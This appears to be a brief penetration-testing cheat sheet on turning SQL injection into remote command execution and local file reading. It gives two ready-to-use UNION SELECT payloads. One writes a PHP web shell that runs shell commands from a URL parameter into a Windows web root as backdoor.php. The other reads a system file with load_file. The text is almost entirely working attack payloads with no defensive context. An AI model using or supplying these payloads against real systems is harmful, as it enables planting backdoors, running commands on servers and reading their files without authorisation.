SQL Injection – RCE and LFI Methods
Upload PHP Command Injection
Following can be used to get RCE / Command Execution when target is vulnerable to SQLi.
1 2 |
union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php' |
Load File via SQLi
Following can be used to read files from target.
1 2 |
union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6 |